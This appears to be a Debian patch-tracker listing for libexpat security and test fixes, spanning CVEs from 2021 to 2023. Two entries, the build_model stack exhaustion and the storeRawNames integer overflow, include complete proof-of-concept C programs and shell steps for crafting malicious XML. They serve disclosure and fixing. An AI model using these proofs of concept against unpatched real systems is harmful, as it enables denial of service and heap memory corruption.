Patch | Description | Author | Forwarded | Bugs | Origin | Last update |
---|---|---|---|---|---|---|
lib-Detect-and-prevent-troublesome-left-shifts-in-fu.patch | lib: Detect and prevent troublesome left shifts in function storeAtts (CVE-2021-45960) | Sebastian Pipping <sebastian@pipping.org> | yes | debian upstream | https://github.com/libexpat/libexpat/commit/0adcb34c49bee5b19bd29b16a578c510c23597ea | 2021-12-27 |
lib-Prevent-integer-overflow-on-m_groupSize-in-funct.patch | lib: Prevent integer overflow on m_groupSize in function doProlog (CVE-2021-46143) | Sebastian Pipping <sebastian@pipping.org> | yes | upstream | https://github.com/libexpat/libexpat/commit/85ae9a2d7d0e9358f356b33977b842df8ebaec2b | 2021-12-25 |
lib-Prevent-integer-overflow-at-multiple-places-CVE-.patch | lib: Prevent integer overflow at multiple places (CVE-2022-22822 to CVE-2022-22827) The involved functions are: addBinding (CVE-2022-22822), build_model (CVE-2022-22823), defineAttribute (CVE-2022-22824), lookup (CVE-2022-22825), nextScaffoldPart (CVE-2022-22826), storeAtts (CVE-2022-22827) | Sebastian Pipping <sebastian@pipping.org> | no | debian | https://github.com/libexpat/libexpat/commit/9f93e8036e842329863bf20395b8fb8f73834d9e | 2021-12-30 |
lib-Detect-and-prevent-integer-overflow-in-XML_GetBu.patch | lib: Detect and prevent integer overflow in XML_GetBuffer (CVE-2022-23852) | Samanta Navarro <ferivoz@riseup.net> | no | | https://github.com/libexpat/libexpat/commit/847a645152f5ebc10ac63b74b604d0c1a79fae40 | 2022-01-22 |
tests-Cover-integer-overflow-in-XML_GetBuffer-CVE-20.patch | tests: Cover integer overflow in XML_GetBuffer (CVE-2022-23852) | Sebastian Pipping <sebastian@pipping.org> | no | | https://github.com/libexpat/libexpat/commit/acf956f14bf79a5e6383a969aaffec98bfbc2e44 | 2022-01-23 |
lib-Prevent-integer-overflow-in-doProlog-CVE-2022-23.patch | lib: Prevent integer overflow in doProlog (CVE-2022-23990) The change from "int nameLen" to "size_t nameLen" addresses the overflow on "nameLen++" in the code "for (; name[nameLen++];)" right above the second change in the patch. | Sebastian Pipping <sebastian@pipping.org> | no | | https://github.com/libexpat/libexpat/commit/ede41d1e186ed2aba88a06e84cac839b770af3a1 | 2022-01-26 |
Prevent-stack-exhaustion-in-build_model.patch | Prevent stack exhaustion in build_model It is possible to trigger stack exhaustion in the build_model function if the depth of nested children in a DTD element is large enough. This happens because build_node is a recursively called function within build_model. The code has been adjusted to run iteratively. It uses the already allocated heap space as a temporary stack (growing from top to bottom). Output is identical to the recursive version. No new fields in data structures were added, i.e. it keeps full API and ABI compatibility. Instead the numchildren variable is used to temporarily keep the index of items (uint vs int). Documentation and readability improvements kindly added by Sebastian. Proof of Concept: 1. Compile poc binary which parses XML file line by line ``` cat > poc.c << EOF #include <err.h> #include <expat.h> #include <stdio.h> XML_Parser parser; static void XMLCALL dummy_element_decl_handler(void *userData, const XML_Char *name, XML_Content *model) { XML_FreeContentModel(parser, model); } int main(int argc, char *argv[]) { FILE *fp; char *p = NULL; size_t s = 0; ssize_t l; if (argc != 2) errx(1, "usage: poc poc.xml"); if ((parser = XML_ParserCreate(NULL)) == NULL) errx(1, "XML_ParserCreate"); XML_SetElementDeclHandler(parser, dummy_element_decl_handler); if ((fp = fopen(argv[1], "r")) == NULL) err(1, "fopen"); while ((l = getline(&p, &s, fp)) > 0) if (XML_Parse(parser, p, (int)l, XML_FALSE) != XML_STATUS_OK) errx(1, "XML_Parse"); XML_ParserFree(parser); free(p); fclose(fp); return 0; } EOF cc -std=c11 -D_POSIX_C_SOURCE=200809L -lexpat -o poc poc.c ``` 2. Create XML file with a lot of nested groups in DTD element ``` cat > poc.xml.zst.b64 << EOF KLUv/aQkACAAPAEA+DwhRE9DVFlQRSB1d3UgWwo8IUVMRU1FTlQgdXd1CigBAHv/58AJAgAQKAIA ECgCABAoAgAQKAIAECgCABAoAgAQKHwAAChvd28KKQIA2/8gV24XBAIAECkCABApAgAQKQIAECkC ABApAgAQKQIAEClVAAAgPl0+CgEA4A4I2VwwnQ== EOF base64 -d poc.xml.zst.b64 \| zstd -d > poc.xml ``` 3. Run Proof of Concept ``` ./poc poc.xml ``` | Samanta Navarro <ferivoz@riseup.net> | yes | upstream | https://github.com/libexpat/libexpat/commit/9b4ce651b26557f16103c3a366c91934ecd439ab | 2022-02-15 |
Prevent-integer-overflow-in-storeRawNames.patch | Prevent integer overflow in storeRawNames It is possible to use an integer overflow in storeRawNames for out-of-boundary heap writes. The default configuration is affected. If compiled with XML_UNICODE then the attack does not work. Compiling with -fsanitize=address confirms the following proof of concept. The problem can be exploited by abusing the m_buffer expansion logic. Even though the initial size of m_buffer is a power of two, eventually it can end up a little bit lower, thus allowing allocations very close to INT_MAX (since INT_MAX/2 can be surpassed). This means that tag names can be parsed which are almost INT_MAX in size. Unfortunately (from an attacker point of view) INT_MAX/2 is also a limitation in string pools. Having a tag name of INT_MAX/2 characters or more is not possible. Expat can convert between different encodings. UTF-16 documents which contain only ASCII-representable characters are twice as large as their ASCII-encoded counterparts. The proof of concept works by taking these three considerations into account: 1. Move the m_buffer size slightly below a power of two by having a short root node <a>. This allows the m_buffer to grow very close to INT_MAX. 2. The string pooling forbids tag names longer than or equal to INT_MAX/2, so keep the attack tag name smaller than that. 3. To be able to still overflow INT_MAX even though the name is limited at INT_MAX/2-1 (nul byte) we use UTF-16 encoding and a tag which only contains ASCII characters. UTF-16 always stores two bytes per character while the tag name is converted to using only one. Our attack node byte count must be a bit higher than 2/3 INT_MAX so the converted tag name is around INT_MAX/3 which in sum can overflow INT_MAX. Thanks to our small root node, m_buffer can handle 2/3 INT_MAX bytes without running into the INT_MAX boundary check. The string pooling is able to store INT_MAX/3 as tag name because the amount is below the INT_MAX/2 limitation. And creating the sum of both eventually overflows in storeRawNames. Proof of Concept: 1. Compile expat with -fsanitize=address. 2. Create Proof of Concept binary which iterates through the input file 16 MB at once for better performance and easier integer calculations: ``` cat > poc.c << EOF #include <err.h> #include <expat.h> #include <stdlib.h> #include <stdio.h> #define CHUNK (16 * 1024 * 1024) int main(int argc, char *argv[]) { XML_Parser parser; FILE *fp; char *buf; int i; if (argc != 2) errx(1, "usage: poc file.xml"); if ((parser = XML_ParserCreate(NULL)) == NULL) errx(1, "failed to create expat parser"); if ((fp = fopen(argv[1], "r")) == NULL) { XML_ParserFree(parser); err(1, "failed to open file"); } if ((buf = malloc(CHUNK)) == NULL) { fclose(fp); XML_ParserFree(parser); err(1, "failed to allocate buffer"); } i = 0; while (fread(buf, CHUNK, 1, fp) == 1) { printf("iteration %d: XML_Parse returns %d\n", ++i, XML_Parse(parser, buf, CHUNK, XML_FALSE)); } free(buf); fclose(fp); XML_ParserFree(parser); return 0; } EOF gcc -fsanitize=address -lexpat -o poc poc.c ``` 3. Construct specially prepared UTF-16 XML file: ``` dd if=/dev/zero bs=1024 count=794624 \| tr '\0' 'a' > poc-utf8.xml echo -n '<a><' \| dd conv=notrunc of=poc-utf8.xml echo -n '><' \| dd conv=notrunc of=poc-utf8.xml bs=1 seek=805306368 iconv -f UTF-8 -t UTF-16LE poc-utf8.xml > poc-utf16.xml ``` 4. Run proof of concept: ``` ./poc poc-utf16.xml ``` | Samanta Navarro <ferivoz@riseup.net> | yes | upstream | https://github.com/libexpat/libexpat/commit/eb0362808b4f9f1e2345a0cf203b8cc196d776d9 | 2022-02-15 |
Prevent-integer-overflow-in-copyString.patch | Prevent integer overflow in copyString The copyString function is only used for encoding strings supplied by the library user. | Samanta Navarro <ferivoz@riseup.net> | yes | upstream | https://github.com/libexpat/libexpat/commit/efcb347440ade24b9f1054671e6bd05e60b4cafd | 2022-02-15 |
lib-Fix-harmless-use-of-uninitialized-memory.patch | lib: Fix (harmless) use of uninitialized memory | Sebastian Pipping <sebastian@pipping.org> | yes | upstream | https://github.com/libexpat/libexpat/commit/6881a4fc8596307ab9ff2e85e605afa2e413ab71 | 2022-02-12 |
lib-Protect-against-malicious-namespace-declarations.patch | lib: Protect against malicious namespace declarations (CVE-2022-25236) | Sebastian Pipping <sebastian@pipping.org> | yes | debian upstream | https://github.com/libexpat/libexpat/commit/a2fe525e660badd64b6c557c2b1ec26ddc07f6e4 | 2022-02-12 |
tests-Cover-CVE-2022-25236.patch | tests: Cover CVE-2022-25236 | Sebastian Pipping <sebastian@pipping.org> | yes | upstream | https://github.com/libexpat/libexpat/commit/2de077423fb22750ebea599677d523b53cb93b1d | 2022-02-12 |
lib-Drop-unused-macro-UTF8_GET_NAMING.patch | lib: Drop unused macro UTF8_GET_NAMING | Sebastian Pipping <sebastian@pipping.org> | yes | upstream | https://github.com/libexpat/libexpat/commit/ee2a5b50e7d1940ba8745715b62ceb9efd3a96da | 2022-02-08 |
lib-Add-missing-validation-of-encoding-CVE-2022-2523.patch | lib: Add missing validation of encoding (CVE-2022-25235) | Sebastian Pipping <sebastian@pipping.org> | yes | debian upstream | https://github.com/libexpat/libexpat/commit/3f0a0cb644438d4d8e3294cd0b1245d0edb0c6c6 | 2022-02-08 |
lib-Add-comments-to-BT_LEAD-cases-where-encoding-has.patch | lib: Add comments to BT_LEAD* cases where encoding has already been validated | Sebastian Pipping <sebastian@pipping.org> | yes | upstream | https://github.com/libexpat/libexpat/commit/c85a3025e7a1be086dc34e7559fbc543914d047f | 2022-02-09 |
tests-Cover-missing-validation-of-encoding-CVE-2022-.patch | tests: Cover missing validation of encoding (CVE-2022-25235) | Sebastian Pipping <sebastian@pipping.org> | yes | upstream | https://github.com/libexpat/libexpat/commit/6a5510bc6b7efe743356296724e0b38300f05379 | 2022-02-08 |
Fix-build_model-regression.patch | Fix build_model regression. The iterative approach in build_model failed to fill children arrays correctly. A preorder traversal is not required and turned out to be the culprit. Use an easier algorithm: Add nodes from the scaffold tree starting at index 0 (root) to the target array whenever children are encountered. This ensures that children are adjacent to each other. This matches the recursive version. Store only the scaffold index in the numchildren field to prevent a direct processing of these children, which would require a recursive solution. This allows the algorithm to iterate through the target array from start to end without jumping back and forth, converting on the fly. | Samanta Navarro <ferivoz@riseup.net> | yes | upstream | https://github.com/libexpat/libexpat/commit/b12f34fe32821a69dc12ff9a021daca0856de238 | 2022-02-19 |
tests-Protect-against-nested-element-declaration-mod.patch | tests: Protect against nested element declaration model regressions | Sebastian Pipping <sebastian@pipping.org> | yes | upstream | https://github.com/libexpat/libexpat/commit/154e565f6ef329c9ec97e6534c411ddde0b320c8 | 2022-02-20 |
lib-Relax-fix-to-CVE-2022-25236-with-regard-to-RFC-3.patch | lib: Relax fix to CVE-2022-25236 with regard to RFC 3986 URI characters | Sebastian Pipping <sebastian@pipping.org> | no | | https://github.com/libexpat/libexpat/commit/2ba6c76fca21397959145e18c5ef376201209020 | 2022-02-27 |
tests-Cover-relaxed-fix-to-CVE-2022-25236.patch | tests: Cover relaxed fix to CVE-2022-25236 | Sebastian Pipping <sebastian@pipping.org> | no | | https://github.com/libexpat/libexpat/commit/e0f852db1e3b1e6d34922c68a653c3cc4b85361c | 2022-03-03 |
lib-Document-namespace-separator-effect-right-in-hea.patch | lib: Document namespace separator effect right in header <expat.h> | Sebastian Pipping <sebastian@pipping.org> | no | | https://github.com/libexpat/libexpat/commit/5dd52182972a35f2251a07784eda35d3d52d3e07 | 2022-03-01 |
lib-doc-Add-a-note-on-namespace-URI-validation.patch | lib\|doc: Add a note on namespace URI validation [Salvatore Bonaccorso: Backport to 2.2.10 for context changes] | Sebastian Pipping <sebastian@pipping.org> | no | | https://github.com/libexpat/libexpat/commit/c57bea96b73eee1c6d5e288f0f57efbf5238e49a | 2022-03-01 |
CVE-2022-40674.patch | Ensure raw tagnames are safe exiting internalEntityParser It is possible to concoct a situation in which parsing is suspended while substituting in an internal entity, so that XML_ResumeParser directly uses internalEntityProcessor as its processor. If the subsequent parse includes some unclosed tags, this will return without calling storeRawNames to ensure that the raw versions of the tag names are stored in memory other than the parse buffer itself. If the parse buffer is then changed or reallocated (for example if processing a file line by line), badness will ensue. This patch ensures storeRawNames is always called when needed after calling doContent. The earlier call to doContent does not need the same protection; it only deals with entity substitution, which cannot leave unbalanced tags, and in any case the raw names will be pointing into the stored entity value, not the parse buffer. | Rhodri James <rhodri@wildebeest.org.uk> | no | | | 2022-08-17 |
CVE-2022-40674_addon.patch | tests: Cover heap use-after-free issue in doContent | Sebastian Pipping <sebastian@pipping.org> | no | | | 2022-09-11 |
lib-Fix-overeager-DTD-destruction-in-XML_ExternalEnt.patch | lib: Fix overeager DTD destruction in XML_ExternalEntityParserCreate | Sebastian Pipping <sebastian@pipping.org> | yes | debian upstream | https://github.com/libexpat/libexpat/commit/5290462a7ea1278a8d5c0d5b2860d4e244f997e4 | 2022-09-20 |
tests-Cover-overeager-DTD-destruction-in-XML_Externa.patch | tests: Cover overeager DTD destruction in XML_ExternalEntityParserCreate | Sebastian Pipping <sebastian@pipping.org> | yes | debian upstream | https://github.com/libexpat/libexpat/commit/43992e4ae25fc3dc0eec0cd3a29313555d56aee2 | 2022-09-19 |
tests-Move-triplet_start_checker-flag-check-after-isFinal.patch | tests: Move triplet_start_checker flag check after isFinal=1 call There is no guarantee that the callback will happen before the parse call with isFinal=XML_TRUE. Let's move the assertion to a location where we know it must have happened. | Snild Dolkow <snild@sony.com> | no | | https://github.com/libexpat/libexpat/commit/d52b4141496bd26bd716d88c67af8f2250bd0da6 | 2023-08-24 |
tests-Set-isFinal-in-test_column_number_after_parse.patch | tests: Set isFinal in test_column_number_after_parse Without this, parsing of the end tag may be deferred, yielding an unexpected column number. | Snild Dolkow <snild@sony.com> | no | | https://github.com/libexpat/libexpat/commit/2cee1061e2fec10633c3f02a961dabf95e85910a | 2023-08-24 |
tests-Set-isFinal-1-in-line-column-number-after-error-tes.patch | tests: Set isFinal=1 in line/column-number-after-error tests | Snild Dolkow <snild@sony.com> | no | | https://github.com/libexpat/libexpat/commit/d4105a9080271a8d4996d2454f89be9992cb268a | 2023-08-31 |
Always-consume-BOM-bytes-when-found-in-prolog.patch | Always consume BOM bytes when found in prolog The byte order mark is not correctly consumed when followed by an incomplete token in a non-final parse. This results in the BOM staying in the buffer, causing an invalid token error later. This was not detected by existing tests because they either parse everything in one call, or add a single byte at a time. By moving `s` forward when we find a BOM, we make sure that the BOM bytes are properly consumed in all cases. | Snild Dolkow <snild@sony.com> | no | | https://github.com/libexpat/libexpat/commit/182bbc350ed8b3c547133a9a44a4f30a0ba3b77e | 2023-08-31 |
tests-Add-_fail-function-and-assert_true-macro.patch | tests: Add _fail() function and assert_true() macro. | Guilhem Moulin <guilhem@debian.org> | no | | https://github.com/libexpat/libexpat/commit/cce19de59f849cbee55c8c62e77481593fac1468 | 2024-09-11 |
tests-Make-test_default_current-insensitive-to-callback-c.patch | tests: Make test_default_current insensitive to callback chunking Instead of testing the exact number and sequence of callbacks, we now test that we get the exact data lengths and sequence of callbacks. The checks become much more verbose, but will now accept any buffer fill strategy -- single bytes, multiple bytes, or any combination thereof. | Snild Dolkow <snild@sony.com> | no | | https://github.com/libexpat/libexpat/commit/182bbc350ed8b3c547133a9a44a4f30a0ba3b77e | 2023-08-31 |
tests-Look-for-single-char-match-in-test_abort_epilog.patch | tests: Look for single-char match in test_abort_epilog ...instead of a full-string match. These tests were depending on getting handler callbacks with exactly one character of data at a time. For example, if test_abort_epilog got "\n\r\n" in one callback, it would fail to match on the '\r', and would not abort parsing as expected. By searching the callback arg for the magic character rather than expecting a full match, the test no longer depends on exact callback timing. `userData` is never NULL in these tests, so that check was left out of the new version. | Snild Dolkow <snild@sony.com> | no | | https://github.com/libexpat/libexpat/commit/4978d285d205d1238c823876134c3e486a3c2fe5 | 2023-08-31 |
tests-Run-SINGLE_BYTES-with-variously-sized-chunks.patch | tests: Run SINGLE_BYTES with variously-sized chunks The _XML_Parse_SINGLE_BYTES function currently calls XML_Parse() one byte at a time. This is useful to detect possible parsing bugs related to having to exit parsing, wait for more data, and resume. This commit makes SINGLE_BYTES even more useful by repeating all tests, changing the chunk size every time. So instead of just one byte at a time, we now also test two bytes at a time, and so on. Tests that don't use SINGLE_BYTES also run multiple times, but are otherwise not affected. This uncovered some issues, which have been fixed in preceding commits. On failure, the chunk size is included in the "FAIL" log prints. | Snild Dolkow <snild@sony.com> | no | | https://github.com/libexpat/libexpat/commit/d2b31760cd5d22b26316d407789caded826857e3 | 2023-08-25 |
tests-set-isFinal-in-test_line_number_after_parse.patch | tests: set isFinal in test_line_number_after_parse Without this, parsing of the start or end tag may be deferred, yielding an unexpected line number. | Snild Dolkow <snild@sony.com> | no | | https://github.com/libexpat/libexpat/commit/2e1253414559d2649cbf5662496800061034eb49 | 2023-09-26 |
tests-set-isFinal-in-test_reset_in_entity.patch | tests: set isFinal in test_reset_in_entity Without this, parsing may be deferred so that the suspending callback hasn't been called when the test checks for it. | Snild Dolkow <snild@sony.com> | no | | https://github.com/libexpat/libexpat/commit/bb3c17198072abe89885949b85f8a0f353ac41c9 | 2023-09-26 |
tests-Remove-early-comment-count-check-in-test_user_param.patch | tests: Remove early comment count check in test_user_parameters Before a parse call with isFinal=XML_TRUE, there is no guarantee that all supplied data has been parsed. Removing the first comment count check removes the test's assumption of such a guarantee. | Snild Dolkow <snild@sony.com> | no | | https://github.com/libexpat/libexpat/commit/a5993b2d42d88e1a39124117a781a055dbb0598b | 2023-09-26 |
tests-Exit-parser_stop_character_handler-if-parser-is-fin.patch | tests: Exit parser_stop_character_handler if parser is finished When test_repeated_stop_parser_between_char_data_calls runs without chunking the input -- which I am about to do in my next commit -- the parser_stop_character_handler callback happens multiple times. This is because stopping the parser doesn't stop all callbacks immediately, which is valid (documented) behavior. The second callback tried to stop the parser again, getting unexpected errors. Let's check the parser status on entry and return early if it's already finished. | Snild Dolkow <snild@sony.com> | no | | https://github.com/libexpat/libexpat/commit/b4d2b76a97ab88854a26f4166cb294a0622144cd | 2023-09-26 |
tests-Replace-invalid-entity-expansion-in-test_alloc_nest.patch | tests: Replace invalid entity expansion in test_alloc_nested_entities %pe2; would ultimately expand to a plain "ABCDEF...", which is not valid in this context. This was not normally hit, since the test would get its expected XML_ERROR_NO_MEMORY before expanding this far. With g_chunkSize=0 and EXPAT_CONTEXT_BYTES=OFF, the number of allocs required to reach that point becomes *just* low enough to reach the final expansion, making the test fail with a very unexpected syntax error. Nesting %pe2; in another entity declaration avoids the problem. | Snild Dolkow <snild@sony.com> | no | | https://github.com/libexpat/libexpat/commit/7b0e27a6981014313a9f30486a0b4d2e0a3ebde3 | 2023-09-28 |
tests-Run-SINGLE_BYTES-with-no-chunking.patch | tests: Run SINGLE_BYTES with no chunking ...in addition to the 1-to-5-byte chunks we've used so far. By starting g_chunkSize at 0, we get to run all the tests that call _XML_Parse_SINGLE_BYTES() as if they just called XML_Parse(). This gives us extra test coverage. | Snild Dolkow <snild@sony.com> | no | | https://github.com/libexpat/libexpat/commit/091ba48d7a5a8fcb65ba383d81d062c6e9046a88 | 2023-09-26 |
CVE-2023-52425/01-119ae27.patch | Grow buffer based on current size Until now, the buffer size to grow to has been calculated based on the distance from the current parse position to the end of the buffer. This means that the size of any already-parsed data was not considered, leading to inconsistent buffer growth. There was also a special case in XML_Parse() when XML_CONTEXT_BYTES was zero, where the buffer size would be set to twice the incoming string length. This patch replaces this with an XML_GetBuffer() call. Growing the buffer based on its total size makes its growth consistent. The commit includes a test that checks that we can reach the max buffer size (usually INT_MAX/2 + 1) regardless of previously parsed content. GitHub CI couldn't allocate the full 1GiB with MinGW/wine32, though it works locally with the same compiler and wine version. As a workaround, the test tries to malloc 1GiB, and reduces `maxbuf` to 512MiB in case of failure. | Snild Dolkow <snild@sony.com> | yes | upstream | https://github.com/libexpat/libexpat/commit/dcbc1436809b7cd4552ed4e929790739d08d0dca | 2023-09-28 |
CVE-2023-52425/02-3484383.patch | Add aaaaaa_*.xml with unreasonably large tokens Some of these currently take a very long time to parse. I set those to only run one loop in the run-benchmark make target. 4096 may be a fairly small buffer, and definitely makes the problem worse than it otherwise would've been, but similar sizes exist in real code: * 2048 bytes in cpython Modules/pyexpat.c * 4096 bytes in skia SkXMLParser.cpp * BUFSIZ bytes (8192 on my machine) in expat/examples The files, too, are inspired by real-life examples: Android stores depth and gain maps as base64-encoded JPEGs inside the XMP data of other JPEGs. Sometimes as a text element, sometimes as an attribute value. I've seen attribute values slightly over 5 MiB in size. | Snild Dolkow <snild@sony.com> | yes | debian upstream | https://github.com/libexpat/libexpat/commit/3484383fa75e0ea2aa716360088813c3b205b261 | 2023-08-17 |
CVE-2023-52425/03-9cdf9b8.patch | Skip parsing after repeated partials on the same token When the parse buffer contains the starting bytes of a token but not all of them, we cannot parse the token to completion. We call this a partial token. When this happens, the parse position is reset to the start of the token, and the parse() call returns. The client is then expected to provide more data and call parse() again. In extreme cases, this means that the bytes of a token may be parsed many times: once for every buffer refill required before the full token is present in the buffer. Math: Assume there's a token of T bytes Assume the client fills the buffer in chunks of X bytes We'll try to parse X, 2X, 3X, 4X ... until mX == T (technically >=) That's (m²+m)X/2 = (T²/X+T)/2 bytes parsed (arithmetic progression) While it is alleviated by larger refills, this amounts to O(T²) Expat grows its internal buffer by doubling it when necessary, but has no way to inform the client about how much space is available. Instead, we add a heuristic that skips parsing when we've repeatedly stopped on an incomplete token. Specifically: * Only try to parse if we have a certain amount of data buffered * Every time we stop on an incomplete token, double the threshold * As soon as any token completes, the threshold is reset This means that when we get stuck on an incomplete token, the threshold grows exponentially, effectively making the client perform larger buffer fills, limiting how many times we can end up re-parsing the same bytes. Math: Assume there's a token of T bytes Assume the client fills the buffer in chunks of X bytes We'll try to parse X, 2X, 4X, 8X ... until (2^k)X == T (or larger) That's (2^(k+1)-1)X bytes parsed -- e.g. 15X if T = 8X This is equal to 2T-X, which amounts to O(T) We could've chosen a faster growth rate, e.g. 4 or 8. Those seem to increase performance further, at the cost of further increasing the risk of growing the buffer more than necessary. This can easily be adjusted in the future, if desired. This is all completely transparent to the client, except for: 1. possible delay of some callbacks (when our heuristic overshoots) 2. apps that never do isFinal=XML_TRUE could miss data at the end For the affected testdata, this change shows a 100-400x speedup. The recset.xml benchmark shows no clear change either way. Before: benchmark -n ../testdata/largefiles/recset.xml 65535 3 3 loops, with buffer size 65535. Average time per loop: 0.270223 benchmark -n ../testdata/largefiles/aaaaaa_attr.xml 4096 3 3 loops, with buffer size 4096. Average time per loop: 15.033048 benchmark -n ../testdata/largefiles/aaaaaa_cdata.xml 4096 3 3 loops, with buffer size 4096. Average time per loop: 0.018027 benchmark -n ../testdata/largefiles/aaaaaa_comment.xml 4096 3 3 loops, with buffer size 4096. Average time per loop: 11.775362 benchmark -n ../testdata/largefiles/aaaaaa_tag.xml 4096 3 3 loops, with buffer size 4096. Average time per loop: 11.711414 benchmark -n ../testdata/largefiles/aaaaaa_text.xml 4096 3 3 loops, with buffer size 4096. Average time per loop: 0.019362 After: ./run.sh benchmark -n ../testdata/largefiles/recset.xml 65535 3 3 loops, with buffer size 65535. Average time per loop: 0.269030 ./run.sh benchmark -n ../testdata/largefiles/aaaaaa_attr.xml 4096 3 3 loops, with buffer size 4096. Average time per loop: 0.044794 ./run.sh benchmark -n ../testdata/largefiles/aaaaaa_cdata.xml 4096 3 3 loops, with buffer size 4096. Average time per loop: 0.016377 ./run.sh benchmark -n ../testdata/largefiles/aaaaaa_comment.xml 4096 3 3 loops, with buffer size 4096. Average time per loop: 0.027022 ./run.sh benchmark -n ../testdata/largefiles/aaaaaa_tag.xml 4096 3 3 loops, with buffer size 4096. Average time per loop: 0.099360 ./run.sh benchmark -n ../testdata/largefiles/aaaaaa_text.xml 4096 3 3 loops, with buffer size 4096. Average time per loop: 0.017956 | Snild Dolkow <snild@sony.com> | yes | debian upstream | https://github.com/libexpat/libexpat/commit/9cdf9b8d77d5c2c2a27d15fb68dd3f83cafb45a1 | 2023-08-17 |
CVE-2023-52425/04-1b9d398.patch | Don't update partial token heuristic on error | Snild Dolkow <snild@sony.com> | yes | debian upstream | https://github.com/libexpat/libexpat/commit/1b9d398517befeb944cbbadadf10992b07e96fa2 | 2023-09-04 |
Autotools-Give-test-suite-access-to-internal-symbols.patch | Autotools: Give test suite access to internal symbols | Sebastian Pipping <sebastian@pipping.org> | no | | https://github.com/libexpat/libexpat/commit/f01a61402cd44bb0cb59db43e70309c01acc50d1 | 2021-04-05 |
CVE-2023-52425/05-9fe3672.patch | tests: Run both with and without partial token heuristic If we always run with the heuristic enabled, it may hide some bugs by grouping up input into bigger parse attempts. | Snild Dolkow <snild@sony.com> | yes | debian upstream | https://github.com/libexpat/libexpat/commit/9fe3672459c1bf10926b85f013aa1b623d855545 | 2023-09-18 |
CVE-2023-52425/06-f1eea78.patch | tests: Add max_slowdown info in test_big_tokens_take_linear_time | Snild Dolkow <snild@sony.com> | yes | debian upstream | https://github.com/libexpat/libexpat/commit/f1eea784d0429bc4813a3d66a8e24e6c9df56be7 | 2023-11-06 |
CVE-2023-52425/07-09957b8.patch | Allow XML_GetBuffer() with len=0 on a fresh parser Previously, len=0 was only OK if a non-zero call had already been made. It makes sense to allow an application to work the same way on a newly-created parser, and not have to care if its incoming buffer happens to be empty. | Snild Dolkow <snild@sony.com> | yes | debian upstream | https://github.com/libexpat/libexpat/commit/09957b8ced725b96a95acff150facda93f03afe1 | 2023-10-26 |
CVE-2023-52425/08-1d3162d.patch | Add app setting for enabling/disabling reparse heuristic | Snild Dolkow <snild@sony.com> | yes | debian upstream | https://github.com/libexpat/libexpat/commit/1d3162da8a85a398ab451aadd6c2ad19587e5a68 | 2023-09-11 |
CVE-2023-52425/09-8ddd8e8.patch | Try to parse even when incoming len is zero If the reparse deferral setting has changed, it may be possible to finish a token. | Snild Dolkow <snild@sony.com> | yes | debian upstream | https://github.com/libexpat/libexpat/commit/8ddd8e86aa446d02eb8d398972d3b10d4cad908a | 2023-09-29 |
CVE-2023-52425/10-ad9c01b.patch | Make external entity parser inherit partial token heuristic setting The test is essentially a copy of the existing test for the setter, adapted to run on the external parser instead of the original one. | Snild Dolkow <snild@sony.com> | yes | debian upstream | https://github.com/libexpat/libexpat/commit/ad9c01be8ee5d3d5cac2bfd3949ad764541d35e7 | 2023-10-26 |
CVE-2023-52425/11-60b7420.patch | Bypass partial token heuristic when close to maximum buffer size For huge tokens, we may end up in a situation where the partial token parse deferral heuristic demands more bytes than Expat's maximum buffer size (currently ~half of INT_MAX) could fit. INT_MAX/2 is 1024 MiB on most systems. Clearly, a token of 950 MiB could fit in that buffer, but the reparse threshold might be such that callProcessor() will defer it, allowing the app to keep filling the buffer until XML_GetBuffer() eventually returns a memory error. By bypassing the heuristic when we're getting close to the maximum buffer size, it will once again be possible to parse tokens in the size range INT_MAX/2/ratio < size < INT_MAX/2 reliably. We subtract the last buffer fill size as a way to detect that the next XML_GetBuffer() call has a risk of returning a memory error -- assuming that the application is likely to keep using the same (or smaller) fill. We subtract XML_CONTEXT_BYTES because that's the maximum amount of bytes that could remain at the start of the buffer, preceding the partial token. Technically, it could be fewer bytes, but XML_CONTEXT_BYTES is normally small relative to INT_MAX, and is much simpler to use. | Snild Dolkow <snild@sony.com> | yes | debian upstream | https://github.com/libexpat/libexpat/commit/60b74209899a67d426d208662674b55a5eed918c | 2023-10-04 |
CVE-2023-52425/12-3d8141d.patch | Bypass partial token heuristic when nearing full buffer ...instead of only when approaching the maximum buffer size INT_MAX/2+1. We'd like to give applications a chance to finish parsing a large token before buffer reallocation, in case the reallocation fails. By bypassing the reparse deferral heuristic when getting close to filling the buffer, we give them this chance -- if the whole token is present in the buffer, it will be parsed at that time. This may come at the cost of some extra reparse attempts. For a token of n bytes, these extra parses cause us to scan over a maximum of 2n bytes (... + n/8 + n/4 + n/2 + n). Therefore, parsing of big tokens remains O(n) in regard to how many bytes we scan in attempts to parse. The cost in reality is lower than that, since the reparses that happen due to the bypass will affect m_partialTokenBytesBefore, delaying the next ratio-based reparse. Furthermore, only the first token that "breaks through" a buffer ceiling takes that extra reparse attempt; subsequent large tokens will only bypass the heuristic if they manage to hit the new buffer ceiling. Note that this cost analysis depends on the assumption that Expat grows its buffer by doubling it (or, more generally, grows it exponentially). If this changes, the cost of this bypass may increase. Hopefully, this would be caught by test_big_tokens_take_linear_time or the new test. The bypass logic assumes that the application uses a consistent fill. If the app increases its fill size, it may miss the bypass (and the normal heuristic will apply). If the app decreases its fill size, the bypass may be hit multiple times for the same buffer size. The very worst case would be to always fill half of the remaining buffer space, in which case parsing of a large n-byte token becomes O(n log n). As an added bonus, the new test case should be faster than the old one, since it doesn't have to go all the way to 1GiB to check the behavior. Finally, this change necessitated a small modification to two existing tests related to reparse deferral. These tests are testing the deferral-enabled setting, and assume that reparsing will not happen for any other reason. By pre-growing the buffer, we make sure that this new deferral does not affect those test cases. | Snild Dolkow <snild@sony.com> | yes | debian upstream | https://github.com/libexpat/libexpat/commit/3d8141d26a3b01ff948e00956cb0723a89dadf7f | 2023-11-20 |
CVE-2023-52425/13-8f8aaf5.patch | tests: Check heuristic bypass with varying buffer fill sizes The bypass works on the assumption that the application uses a consistent fill size. Let's make some assertions about what should happen when the application doesn't do that -- most importantly, that parsing does happen eventually, and that the number of scanned bytes doesn't explode. |
Snild Dolkow <snild@sony.com> | yes | debian upstream | https://github.com/libexpat/libexpat/commit/8f8aaf5c8e8a6e812dd8dadd96cf9bd044bc085a | 2023-11-24 |
CVE-2023-52425/14-09fdf99.patch | xmlwf: Support disabling reparse deferral | Sebastian Pipping <sebastian@pipping.org> | yes | debian upstream | https://github.com/libexpat/libexpat/commit/09fdf998e7cf3f8f9327e6602077791095aedd4d | 2023-11-09 |
